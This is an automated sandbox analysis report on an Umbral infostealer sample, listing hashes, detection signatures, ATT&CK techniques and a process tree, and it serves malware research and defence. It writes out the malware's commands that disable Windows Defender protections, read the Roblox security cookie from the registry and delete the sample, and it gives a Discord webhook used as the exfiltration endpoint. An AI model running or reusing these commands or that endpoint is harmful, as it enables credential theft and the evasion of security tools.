Analysis
-
max time kernel
22s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
13-12-2024 09:18
Behavioral task
behavioral1
Sample
88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe
Resource
win7-20241023-en
General
-
Target
88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe
-
Size
3.0MB
-
MD5
1335a17d311b929988693fb526dc4717
-
SHA1
062830cb07ce430fe049627e001ef23fba8ba351
-
SHA256
88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22
-
SHA512
4a4496ed95c7ff13e8735646a6b8c478742a2f152a3733122fcbac54c0cd7c04571acae789c2ac67dc07d542663290c9e32b3335827e122470d8b887477d7bab
-
SSDEEP
49152:NguQhMOPX5M+RXNM5428gYbM8gkw0Q4qAew+0Fr95s9e54OyRGEK2+qc2LBhW:6/hMOP2a9MLiVed0Zqe54OCGL2NLPW
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1118163594568286339/M-x5dkJ7qP3mQPZTzttw8LKBX9G63bPw9edrYMRuBg3sffUGWg-W4EW9HaBcdak0-wis
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/memory/2504-18-0x0000000001350000-0x0000000001B94000-memory.dmp family_umbral behavioral1/memory/2504-19-0x0000000001350000-0x0000000001B94000-memory.dmp family_umbral behavioral1/memory/2504-65-0x0000000001350000-0x0000000001B94000-memory.dmp family_umbral -
Umbral family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe -
pid Process 1768 powershell.exe 1264 powershell.exe 536 powershell.exe 2632 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe -
Deletes itself 1 IoCs
pid Process 708 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2504-18-0x0000000001350000-0x0000000001B94000-memory.dmp themida behavioral1/memory/2504-19-0x0000000001350000-0x0000000001B94000-memory.dmp themida behavioral1/memory/2504-65-0x0000000001350000-0x0000000001B94000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 708 cmd.exe 1100 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2184 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1100 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 2632 powershell.exe 1768 powershell.exe 1264 powershell.exe 2624 powershell.exe 536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe Token: SeIncreaseQuotaPrivilege 2912 wmic.exe Token: SeSecurityPrivilege 2912 wmic.exe Token: SeTakeOwnershipPrivilege 2912 wmic.exe Token: SeLoadDriverPrivilege 2912 wmic.exe Token: SeSystemProfilePrivilege 2912 wmic.exe Token: SeSystemtimePrivilege 2912 wmic.exe Token: SeProfSingleProcessPrivilege 2912 wmic.exe Token: SeIncBasePriorityPrivilege 2912 wmic.exe Token: SeCreatePagefilePrivilege 2912 wmic.exe Token: SeBackupPrivilege 2912 wmic.exe Token: SeRestorePrivilege 2912 wmic.exe Token: SeShutdownPrivilege 2912 wmic.exe Token: SeDebugPrivilege 2912 wmic.exe Token: SeSystemEnvironmentPrivilege 2912 wmic.exe Token: SeRemoteShutdownPrivilege 2912 wmic.exe Token: SeUndockPrivilege 2912 wmic.exe Token: SeManageVolumePrivilege 2912 wmic.exe Token: 33 2912 wmic.exe Token: 34 2912 wmic.exe Token: 35 2912 wmic.exe Token: SeIncreaseQuotaPrivilege 2912 wmic.exe Token: SeSecurityPrivilege 2912 wmic.exe Token: SeTakeOwnershipPrivilege 2912 wmic.exe Token: SeLoadDriverPrivilege 2912 wmic.exe Token: SeSystemProfilePrivilege 2912 wmic.exe Token: SeSystemtimePrivilege 2912 wmic.exe Token: SeProfSingleProcessPrivilege 2912 wmic.exe Token: SeIncBasePriorityPrivilege 2912 wmic.exe Token: SeCreatePagefilePrivilege 2912 wmic.exe Token: SeBackupPrivilege 2912 wmic.exe Token: SeRestorePrivilege 2912 wmic.exe Token: SeShutdownPrivilege 2912 wmic.exe Token: SeDebugPrivilege 2912 wmic.exe Token: SeSystemEnvironmentPrivilege 2912 wmic.exe Token: SeRemoteShutdownPrivilege 2912 wmic.exe Token: SeUndockPrivilege 2912 wmic.exe Token: SeManageVolumePrivilege 2912 wmic.exe Token: 33 2912 wmic.exe Token: 34 2912 wmic.exe Token: 35 2912 wmic.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeIncreaseQuotaPrivilege 1088 wmic.exe Token: SeSecurityPrivilege 1088 wmic.exe Token: SeTakeOwnershipPrivilege 1088 wmic.exe Token: SeLoadDriverPrivilege 1088 wmic.exe Token: SeSystemProfilePrivilege 1088 wmic.exe Token: SeSystemtimePrivilege 1088 wmic.exe Token: SeProfSingleProcessPrivilege 1088 wmic.exe Token: SeIncBasePriorityPrivilege 1088 wmic.exe Token: SeCreatePagefilePrivilege 1088 wmic.exe Token: SeBackupPrivilege 1088 wmic.exe Token: SeRestorePrivilege 1088 wmic.exe Token: SeShutdownPrivilege 1088 wmic.exe Token: SeDebugPrivilege 1088 wmic.exe Token: SeSystemEnvironmentPrivilege 1088 wmic.exe Token: SeRemoteShutdownPrivilege 1088 wmic.exe Token: SeUndockPrivilege 1088 wmic.exe Token: SeManageVolumePrivilege 1088 wmic.exe Token: 33 1088 wmic.exe Token: 34 1088 wmic.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2504 wrote to memory of 2912 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 30 PID 2504 wrote to memory of 2912 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 30 PID 2504 wrote to memory of 2912 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 30 PID 2504 wrote to memory of 2912 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 30 PID 2504 wrote to memory of 2856 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 33 PID 2504 wrote to memory of 2856 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 33 PID 2504 wrote to memory of 2856 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 33 PID 2504 wrote to memory of 2856 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 33 PID 2504 wrote to memory of 2632 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 35 PID 2504 wrote to memory of 2632 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 35 PID 2504 wrote to memory of 2632 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 35 PID 2504 wrote to memory of 2632 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 35 PID 2504 wrote to memory of 1768 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 37 PID 2504 wrote to memory of 1768 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 37 PID 2504 wrote to memory of 1768 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 37 PID 2504 wrote to memory of 1768 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 37 PID 2504 wrote to memory of 1264 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 39 PID 2504 wrote to memory of 1264 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 39 PID 2504 wrote to memory of 1264 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 39 PID 2504 wrote to memory of 1264 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 39 PID 2504 wrote to memory of 2624 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 41 PID 2504 wrote to memory of 2624 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 41 PID 2504 wrote to memory of 2624 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 41 PID 2504 wrote to memory of 2624 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 41 PID 2504 wrote to memory of 1088 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 43 PID 2504 wrote to memory of 1088 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 43 PID 2504 wrote to memory of 1088 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 43 PID 2504 wrote to memory of 1088 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 43 PID 2504 wrote to memory of 1784 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 45 PID 2504 wrote to memory of 1784 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 45 PID 2504 wrote to memory of 1784 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 45 PID 2504 wrote to memory of 1784 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 45 PID 2504 wrote to memory of 1244 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 47 PID 2504 wrote to memory of 1244 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 47 PID 2504 wrote to memory of 1244 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 47 PID 2504 wrote to memory of 1244 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 47 PID 2504 wrote to memory of 536 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 49 PID 2504 wrote to memory of 536 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 49 PID 2504 wrote to memory of 536 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 49 PID 2504 wrote to memory of 536 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 49 PID 2504 wrote to memory of 2184 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 51 PID 2504 wrote to memory of 2184 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 51 PID 2504 wrote to memory of 2184 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 51 PID 2504 wrote to memory of 2184 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 51 PID 2504 wrote to memory of 708 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 53 PID 2504 wrote to memory of 708 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 53 PID 2504 wrote to memory of 708 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 53 PID 2504 wrote to memory of 708 2504 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe 53 PID 708 wrote to memory of 1100 708 cmd.exe 55 PID 708 wrote to memory of 1100 708 cmd.exe 55 PID 708 wrote to memory of 1100 708 cmd.exe 55 PID 708 wrote to memory of 1100 708 cmd.exe 55 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2856 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe"C:\Users\Admin\AppData\Local\Temp\88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe"2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2856
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
PID:1244
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:536
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:2184
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22.exe" && pause2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\SysWOW64\PING.EXEping localhost3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1100
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5ad8c0647a7980e27d796aca56d30c937
SHA1d83bcd8819f2b122298cf8d036886c6aaafebcd2
SHA256f38997a65697bb310a5e77bf3ae0596f4f35d3bb8084556dd94c6b171e6ac9f4
SHA512dcf34fe6832a02662b5c779167f6b4487eaa7eb1db0c5fb35edf196236dc1b523a8c9c83dcd2dcc5ce29e8393286940a78f6db13480412661a7a2d4467d5ae9e